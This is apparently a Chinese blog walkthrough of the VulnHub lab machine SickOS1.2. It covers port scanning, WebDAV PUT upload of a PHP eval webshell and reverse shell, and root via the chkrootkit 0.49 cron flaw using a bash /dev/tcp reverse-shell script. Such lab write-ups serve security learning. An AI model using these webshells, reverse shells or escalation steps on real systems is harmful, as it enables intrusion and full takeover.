[vulnhub] SickOS1.2

First Post:

Last Update:

Word Count:
5.1k

Read Time:
29 min

853e1f76c1d44925cbd6ac026246fe1a12342800

信息收集

nmap

Host detection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:28 EDT
Nmap scan report for 192.168.56.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.56.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:EC:CE:9E (VMware)
Nmap scan report for 192.168.56.136
Host is up (0.00012s latency).
MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Nmap scan report for 192.168.56.254
Host is up (0.00083s latency).
MAC Address: 00:50:56:E2:96:B0 (VMware)
Nmap scan report for 192.168.56.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.09 seconds

Port scan

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.136        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:31 EDT
Nmap scan report for 192.168.56.136
Host is up (0.0012s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds

只开了22,80两个端口,攻击面有点小。

TCP Service OS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 192.168.56.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:32 EDT
Nmap scan report for 192.168.56.136
Host is up (0.00093s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:F7:DE:A9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds

80端口运行的lighttpd服务版本是1.4.28,其他没啥信息了。

UDP

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU 192.168.56.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:35 EDT
Nmap scan report for 192.168.56.136
Host is up (0.00056s latency).
All 1000 scanned ports on 192.168.56.136 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 21.73 seconds

过。

Vuln scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln 192.168.56.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 11:36 EDT
Nmap scan report for 192.168.56.136
Host is up (0.0017s latency). 
Not shown: 998 filtered tcp ports (no-response)  
PORT   STATE SERVICE     
22/tcp open  ssh  
80/tcp open  http 
|_http-csrf: Couldn't find any CSRF vulnerabilities. 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:                
|   VULNERABLE:              
|   Slowloris DOS attack                
|     State: LIKELY VULNERABLE 
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|_  /test/: Test page
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:F7:DE:A9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 87.09 seconds

只有一个可能存在的DOS漏洞,没啥帮助。

vuln search

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ searchsploit lighttpd 1.4   
-------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                |  Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
lighttpd - Denial of Service (PoC)                                                                            | linux/dos/18295.txt
Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities        | windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution                                            | multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution                                            | linux/remote/4437.c
lighttpd 1.4.31 - Denial of Service (PoC)                                                                     | linux/dos/22902.sh
Lighttpd 1.4.x - mod_userdir Information Disclosure                                                           | linux/remote/31396.txt
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service                                             | linux/dos/33591.sh
Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure                                                      | multiple/remote/8786.txt
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

在exp-db也没找到 lighttpd 1.4.28可以用的漏洞

nikto

nmap没扫出什么信息,试试nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~]
└─$ sudo nikto -h 192.168.56.136                                     
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.136
+ Target Hostname:    192.168.56.136
+ Target Port:        80
+ Start Time:         2023-04-19 11:40:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-04-19 11:41:11 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

只发现了一个/test目录。其他没啥信息。

Web fingerprint

1
2
3
┌──(kali㉿kali)-[~]
└─$ whatweb 192.168.56.136
http://192.168.56.136 [200 OK] Country[RESERVED][ZZ], HTTPServer[lighttpd/1.4.28], IP[192.168.56.136], PHP[5.3.10-1ubuntu3.21], X-Powered-By[PHP/5.3.10-1ubuntu3.21], lighttpd[1.4.28]

网页后端是php写的。

web

先开网页看一眼吧

确实。但是没信息了。

看看/test吧。

发现目录是空的,啥也没有。

得。先目录扫描一下看看有没有其他目录吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                   
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/04/20 08:19:00 Starting gobuster in directory enumeration mode
===============================================================
/test                 (Status: 301) [Size: 0] [--> http://192.168.56.136/test/]
/%7Echeckout%7E       (Status: 403) [Size: 345]
Progress: 220251 / 220561 (99.86%)
===============================================================
2023/04/20 08:19:59 Finished
===============================================================

无敌了,啥也没有。只有个/test以及根目录/。(checkou也没东西,别看了)

想办法从这两个目录下手吧。

bing搜了一下还有什么别的信息收集方法,发现个基于OWSAP的web安全测试手册里面提到了验证网页支持的所有HTTP方法。除了常见的POSTGET方法,如果我们能使用PUT,将能实现任意文件上传。我们可以在请求中使用OPTIONS方法查看页面支持的HTTP方法。

curl的实现:curl -X OPTIONS <ip>, -X指定HTTP方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~]
└─$ sudo curl -v -X OPTIONS 192.168.56.136
*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: PHP/5.3.10-1ubuntu3.21
< Content-type: text/html
< Transfer-Encoding: chunked
< Date: Wed, 19 Apr 2023 16:43:58 GMT
< Server: lighttpd/1.4.28
< 
<html>

<img src="blow.jpg">

</html>

<!-- NOTHING IN HERE ///\\\ -->>>>
* Connection #0 to host 192.168.56.136 left intact

可以看到根目录下不支持什么别的方法。

看看/test的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ sudo curl -v -X OPTIONS 192.168.56.136/test
*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.56.136/test/
< Content-Length: 0
< Date: Wed, 19 Apr 2023 16:50:42 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.56.136 left intact

我们发现/test目录下支持PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK等多种方法。其中也有我们最想要的PUT

漏洞利用

传一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -v --upload-file test.html
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 38
> Expect: 100-continue
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 417 Expectation Failed
< Content-Type: text/html
< Content-Length: 363
< Connection: close
< Date: Wed, 19 Apr 2023 17:14:59 GMT
< Server: lighttpd/1.4.28
< 
{ [363 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>417 - Expectation Failed</title>
 </head>
 <body>
  <h1>417 - Expectation Failed</h1>
 </body>
</html>
 90   401  100   363    0     0   154k      0 --:--:-- --:--:-- --:--:--  177k
* Closing connection 0

417,啥情况,查一下,发现是服务器端Expectation的问题。默认的是Expect: 100-continue

所以我们在Header里面将Expect设置为空即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -T test.html -H "Expect:" -v
[sudo] password for kali: 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 38
> 
} [38 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 345
< Date: Wed, 19 Apr 2023 17:42:29 GMT
< Server: lighttpd/1.4.28
< 
{ [345 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>403 - Forbidden</title>
 </head>
 <body>
  <h1>403 - Forbidden</h1>
 </body>
</html>
100   383  100   345  100    38   126k  14323 --:--:-- --:--:-- --:--:--  187k
* Connection #0 to host 192.168.56.136 left intact

403没想到的,哪里出问题了,奇了怪了。

测试一下PUT方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -X PUT -v                   
*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 17:43:48 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.56.136 left intact

奇了怪了,200,完全没问题啊。

难道因为Header里的Agent是curl给ban了?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test -T test.html -H "Expect:" -v -A "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test HTTP/1.1
> Host: 192.168.56.136
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
> Accept: */*
> Content-Length: 38
> 
} [38 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 345
< Date: Wed, 19 Apr 2023 17:46:44 GMT
< Server: lighttpd/1.4.28
< 
{ [345 bytes data]
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>403 - Forbidden</title>
 </head>
 <body>
  <h1>403 - Forbidden</h1>
 </body>
</html>
100   383  100   345  100    38   136k  15403 --:--:-- --:--:-- --:--:--  187k
* Connection #0 to host 192.168.56.136 left intact

很显然并不是。

算了。用-X PUT --data传试试行不行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/test.html -v -X PUT --data "<script>alert('put is ok') </script>" 
*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/test.html HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 36
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:03:45 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.56.136 left intact

还真行。那我们把一句话木马传上去用蚁剑连接试试。

<?php @eval($_POST["shell"]); ?>

传上去一连,轻松连接,非常ok。

蚁剑的shell用起来怪怪的。

而且有点不死心,为啥之前的方法传不上去,我们用刚才那种URL写法把php-reverse-shell传上去。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/shell.php -T shell.php -H "Expect:" -v                                                         
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/shell.php HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 5496
> 
} [5496 bytes data]
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:09:51 GMT
< Server: lighttpd/1.4.28
< 
100  5496    0     0  100  5496      0  1888k --:--:-- --:--:-- --:--:-- 2683k
* Connection #0 to host 192.168.56.136 left intact

可以发现竟然成功传上去了。

我们传的php-reverse-shell用的4444端口,始终收不到反弹shell。

换个443试试.

这次上传定位到上传失败问题:192.168.56.136/test/才能传上去,192.168.56.136/test会失败。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
└─$ sudo curl 192.168.56.136/test/ -T door.php -H "Expect:" -v 
*   Trying 192.168.56.136:80...
* Connected to 192.168.56.136 (192.168.56.136) port 80 (#0)
> PUT /test/door.php HTTP/1.1
> Host: 192.168.56.136
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 31
> 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Wed, 19 Apr 2023 18:23:03 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.56.136 left intact

轻松连接。

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvp 443 
listening on [any] 443 ...
192.168.56.136: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.136] 51687
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 11:40:47 up  3:13,  0 users,  load average: 0.00, 0.02, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

提升权限

  1. sudo -l need password 需要密码。寄。
  2. 看看带SUID的程序 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    www-data@ubuntu:/$ find / -type f -perm -04000 -ls 2>/dev/null
    find / -type f -perm -04000 -ls 2>/dev/null
    667707  268 -rwsr-xr--   1 root     dip        273272 Feb  4  2011 /usr/sbin/pppd
    667843   20 -rwsr-sr-x   1 libuuid  libuuid     17976 Mar 29  2012 /usr/sbin/uuidd
    786948    8 -rwsr-xr-x   1 root     root         5564 Dec 13  2011 /usr/lib/eject/dmcrypt-get-device
    1055122  244 -rwsr-xr-x   1 root     root       248056 Jan 13  2016 /usr/lib/openssh/ssh-keysign
    668412   12 -rwsr-xr-x   1 root     root         9728 Feb 16  2016 /usr/lib/pt_chown
    668120   12 -r-sr-xr-x   1 root     root         9532 Mar 30  2016 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
    668337   16 -r-sr-xr-x   1 root     root        14320 Mar 30  2016 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
    1182917  312 -rwsr-xr--   1 root     messagebus   316824 Jun 13  2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    660925   72 -rwsr-xr-x   2 root     root        69708 Feb 27  2013 /usr/bin/sudoedit
    667308   16 -rwsr-xr-x   1 root     root        14012 Nov  8  2011 /usr/bin/traceroute6.iputils
    660925   72 -rwsr-xr-x   2 root     root        69708 Feb 27  2013 /usr/bin/sudo
    659044   32 -rwsr-xr-x   1 root     root        31748 Sep 12  2012 /usr/bin/chsh
    659043   44 -rwsr-xr-x   1 root     root        41284 Sep 12  2012 /usr/bin/passwd
    659041   40 -rwsr-xr-x   1 root     root        40292 Sep 12  2012 /usr/bin/chfn
    667072   44 -rwsr-sr-x   1 daemon   daemon      42800 Oct 25  2011 /usr/bin/at
    667649   56 -rwsr-xr-x   1 root     root        56208 Jul 28  2011 /usr/bin/mtr
    659047   60 -rwsr-xr-x   1 root     root        57956 Sep 12  2012 /usr/bin/gpasswd
    658916   32 -rwsr-xr-x   1 root     root        30896 Sep 12  2012 /usr/bin/newgrp
    1179695   88 -rwsr-xr-x   1 root     root        88760 Mar 29  2012 /bin/mount
    1179715   40 -rwsr-xr-x   1 root     root        39116 Nov  8  2011 /bin/ping6                          
    1182983   28 -rwsr-xr-x   1 root     root        26252 Mar  2  2012 /bin/fusermount
    1179696   68 -rwsr-xr-x   1 root     root        67720 Mar 29  2012 /bin/umount
    1179714   36 -rwsr-xr-x   1 root     root        34740 Nov  8  2011 /bin/ping
    1179689   32 -rwsr-xr-x   1 root     root        31116 Sep 12  2012 /bin/su

at没权限,mtr读文件还是成功不了。无果。

  1. 看看crontab。
    常规crontab表,一眼没啥可用的东西。
  2. 传linpeas吧。运行一下,记录一下看起来有点说法的东西 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    ══╣ Some home ssh config file was found
    /usr/share/doc/openssh-client/examples/sshd_config                                                      
    AuthorizedKeysFile      .ssh/authorized_keys
    Subsystem       sftp    /usr/libexec/sftp-server


    ╔══════════╣ Analyzing Interesting logs Files (limit 70)
                
    -rw-r--r-- 1 www-data www-data 6927 Apr 19 20:02 /var/log/lighttpd/error.log

    ╔══════════╣ Analyzing Other Interesting Files (limit 70)
    -rw-r--r-- 1 root root 3486 Mar 28  2013 /etc/skel/.bashrc                                              
    -rw-r--r-- 1 john john 3486 Mar 30  2016 /home/john/.bashrc

    -rw-r--r-- 1 root root 675 Mar 28  2013 /etc/skel/.profile
    -rw-r--r-- 1 john john 675 Mar 30  2016 /home/john/.profile


    ╔══════════╣ Cron jobs
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs                  
    /usr/bin/crontab                                                                                        
    incrontab Not Found
    -rw-r--r-- 1 root root     722 Jun 19  2012 /etc/crontab                                                

    /etc/cron.daily:
    total 72
    drwxr-xr-x  2 root root  4096 Apr 12  2016 .
    drwxr-xr-x 84 root root  4096 Apr 19 20:39 ..
    -rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
    -rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
    -rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
    -rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
    -rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
    -rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
    -rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
    -rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
    -rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
    -rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
    -rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
    -rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
    -rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

    /etc/cron.hourly:
    total 12
    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

    /etc/cron.monthly:
    total 12
    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

    /etc/cron.weekly:
    total 20
    drwxr-xr-x  2 root root 4096 Mar 30  2016 .
    drwxr-xr-x 84 root root 4096 Apr 19 20:39 ..
    -rw-r--r--  1 root root  102 Jun 19  2012 .placeholder
    -rwxr-xr-x  1 root root  730 Sep 13  2013 apt-xapian-index
    -rwxr-xr-x  1 root root  907 Dec 28  2012 man-db

    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

逐条验证看下来,只有/etc/cron.daily看起来有点说法,因为下面可执行文件很多,且这些文件每天执行,看看有什么能用的吧。
挨个看了看,都是些脚本,没看懂都是干啥的,直接挨个name + exp查一下有没有可以利用的漏洞吧。

  1. 发现chkrootkit存在提权漏洞。我们先鉴定一下他的版本,chkrootkit -V 0.49,刚好是有漏洞的版本。
  2. 查查exp: 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    ┌──(kali㉿kali)-[~/vulnhub/SickOS1.2/workSpace]
    └─$ searchsploit chkrootkit 0.4   
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                                                                                                  |  Path
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Chkrootkit - Local Privilege Escalation (Metasploit)         | linux/local/38775.rb
    Chkrootkit 0.49 - Local Privilege Escalation                 | linux/local/33899.txt
    -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results

下载下来看看。

  1. 开搞之前我们先切换一下shell,因为之前4444是明显不通的,说明有防火墙过滤。所以我们试试8080这种端口,果然可以。
  2. 开搞 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    $ cat << EOF > update
    > #!/bin/bash
    > bash -i >& /dev/tcp/192.168.56.132/443 0>&1
    > EOF
    $ ls
    VMwareDnD
    php.socket-0
    update
    vgauthsvclog.txt.0
    vmware-root
    $ cat update
    #!/bin/bash
    bash -i >& /dev/tcp/192.168.56.132/443 0>&1

写完了,等了半天没反应。难道哪里出问题了?或者说他叫cron.daily我运气不好要等一天???

  1. 急了,尝试怎么直接运行。直接 ./chkrootkit没有任何反应。sudo也没权限。直接运行update倒是可以收到shell。网上查了一下怎么运行定时任务,没找到,突然想起定时任务里面运行是用run-parts运行的。试试看,文件夹下运行出错,查查看了下run-parts。发现他会运行指定文件下第一层的所有可执行文件。
  2. 试试run-parts /etc/cron.daily
    OK,收到了捏。 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    ┌──(kali㉿kali)-[~]
    └─$ sudo nc -lvp 443
    [sudo] password for kali: 
    listening on [any] 443 ...
    192.168.56.136: inverse host lookup failed: Host name lookup failure
    connect to [192.168.56.132] from (UNKNOWN) [192.168.56.136] 57899
    bash: no job control in this shell
    root@ubuntu:~# whoami
    whoami
    root
